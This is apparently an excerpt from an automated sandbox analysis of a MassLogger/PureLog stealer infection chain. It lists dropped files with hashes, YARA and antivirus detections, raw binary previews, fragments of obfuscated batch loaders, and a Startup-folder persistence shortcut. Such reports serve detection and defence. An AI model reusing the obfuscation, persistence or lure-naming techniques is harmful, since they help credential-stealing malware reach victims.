                                                                                                            C:\Users\user\AppData\Local\Temp\Microsofts.exePO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  C:\Users\user\AppData\Local\Temp\Trading_AIBot.exePO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                    PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                          F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):520
                                                                                                                                      Entropy (8bit):5.37653962137826
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPtXR5fOKbbDLI4MWuPJKMsDbKhav:MLUE4K5E4K1BIKDE4KhKMaKhk
                                                                                                                                      MD5:700CE124EFD2CD54F22B6C37D63668B1
                                                                                                                                      SHA1:21B5C0030C45972F1E451683A30EE6DC29E7A8AD
                                                                                                                                      SHA-256:FF17BE52698BF4D59DA4F4A98E21EA17CD2F10E95C060335B4D337A870FF8316
                                                                                                                                      SHA-512:A5285CBB2A4B3BA9F8F64CA15F5105C32B6DAF973B405D6C56E3ACDE5218E631EE299296AA60A9291DF5EE85079786EB60CE925E0BF126210237A2903299714F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1804
                                                                                                                                      Entropy (8bit):5.207910328423403
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:fSHJSGfs4/ymKagv4RUgZoU99tK8NfNooc+QIrW62aVn:KHIGH/vKNIHWA2Kfo+QAW1aV
                                                                                                                                      MD5:331C5A3D7FF49B58C613EB52486FE9C7
                                                                                                                                      SHA1:A5DC07F91C3BE6B8F75E5DFBBAF180B886DEB8A0
                                                                                                                                      SHA-256:E2D74D28C3056D0F983F7DE8A68A5365668A1DB1BBFB4DB1951079F5A9A3025D
                                                                                                                                      SHA-512:3C841888263C9B06BAE24318B60671607F3828D387525A9420B3D55A6CE0CE1C9C234723F8283F463B7E63554AE19566A71FBD2FCC13B3F3279AED6334A164E0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@...e...........................................................T...............n$....<@.{..uR.......*.Microsoft.Management.Infrastructure.Native..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4..................%`99B....9...........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Microsofts.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):98816
                                                                                                                                      Entropy (8bit):5.666546286050177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                                      MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                      SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                                      SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                                      SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):70656
                                                                                                                                      Entropy (8bit):4.910353963160109
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                      MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                      SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                      SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                      SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: F7Xu8bRnXT.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2kagyev.r4c.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rih2jbxm.pwl.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5wvqpes.a3t.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u11qhpy4.dba.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):665670656
                                                                                                                                      Entropy (8bit):7.99999937128988
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:
                                                                                                                                      MD5:785BCB4933871B92E40A89544BFA615E
                                                                                                                                      SHA1:926A493B8D95768B438BB11E5D7CFDE0F70D213D
                                                                                                                                      SHA-256:75A815D3B71446F95DD5042E58737063A148761817DB1F65F8283A26614415A8
                                                                                                                                      SHA-512:500D2D52A7666B861E228EA7A903351D8EDA13922BACC9E75C5F86EC4474CE882ED135D569743640C2217766463535C994E951F8131DE6BDD3D8F05EC43CB7C3
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1820
                                                                                                                                      Entropy (8bit):2.4182561384360683
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8PsXUCV/tz0/CSL4WWeMNDyWlT9KWQ17+AUvO4Zv7L1Q17+ANCNfBf4t2YCBTo8:80rWLqeMNmG9KXR+O4ZvPqRMjJT
                                                                                                                                      MD5:8C754917840362CAC6F2226DB0CC8DDE
                                                                                                                                      SHA1:BB221F2D76706A961AC0F561D9862507A742F40E
                                                                                                                                      SHA-256:07E44921181835B94E444DAB410EF555932977AF140E0ED89E5F3841C613F7BE
                                                                                                                                      SHA-512:92BD4A18FDEBA2CE1C424ADFBBF05C0FA5B342ED498C5621679666142FC04C921883EC82D0D404D2AAA9D8BCBE9AE65D42291E1959388B4F4CFCF3561960327B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.@......................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................

                                                                                                                                      C:\Users\Public\Libraries\FX.cmd

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8556
                                                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                                                      C:\Users\Public\Libraries\NEO.cmd

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):46543
                                                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                                                      C:\Users\Public\Libraries\Oupzhkpr

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):679957
                                                                                                                                      Entropy (8bit):7.4483963454083435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
                                                                                                                                      MD5:25A482D7B6698E7666A523C910799F13
                                                                                                                                      SHA1:18B17A1E14069E747F5076F97A9654D8D99E5ADA
                                                                                                                                      SHA-256:4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
                                                                                                                                      SHA-512:5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.

                                                                                                                                      C:\Users\Public\Libraries\Oupzhkpr.PIF

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2145792
                                                                                                                                      Entropy (8bit):7.486736694173577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:EdqswGco/j1HEFW1bB9HI8QrwiycY5vtxq5GtGco/j1HEFW1bB9HI8QrwiycY5vF:E8swjWdb1jWdbJ
                                                                                                                                      MD5:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      SHA1:1B12238410D619F0797042CA0777D7C05B08F410
                                                                                                                                      SHA-256:9654CBD553DF628F50A99EC6F8B405901898C3C9EB99C8A3BA4FBD586290948B
                                                                                                                                      SHA-512:7E83E17A42F8C2FC0A8743AD43FF592CBE48BEBE075889C98091424E395C72C50F807DE5746F8A5E9CB07466798AF12462AFC52EDC5B3374F64ADA3CCE357AB9
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................*...........8.......@....@..........................P!..................@...........................@...%......TF.......................l...................................................G...............................text............ .................. ..`.itext..T....0.......$.............. ..`.data... ....@......................@....bss.....6...............................idata...%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...l.......n..................@..B.rsrc...TF.......H...v..............@..@.............@!....... .............@..@................................................................................................

                                                                                                                                      C:\Users\Public\Libraries\rpkhzpuO.pif

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):175800
                                                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                                                      C:\Users\Public\Oupzhkpr.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):104
                                                                                                                                      Entropy (8bit):5.156734550410475
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxbVbAIA5ov:HRYFVmTWDyzKNafExbVs2v
                                                                                                                                      MD5:FB3D5D8A14664ED4C4E754BA1C68AC30
                                                                                                                                      SHA1:706580AE564D3FB316FFCCB74AF60BD21424923B
                                                                                                                                      SHA-256:EC200831AA481803FB7421C284F619BA6C32FD19E06EFAEDF7D7F47E68A591AF
                                                                                                                                      SHA-512:0DF92E6DE01CE72C294EE8CB418C4579AE8A6E0E9A455103E612CEA6CDA88B51EBB247C690FD8DA9C92009C0340A4593430B3ADA2F934C13260C4ACCB337F23E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=900607..HotKey=80..

                                                                                                                                      C:\Users\Public\OupzhkprF.cmd

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\PO_B2W984.com
                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15789
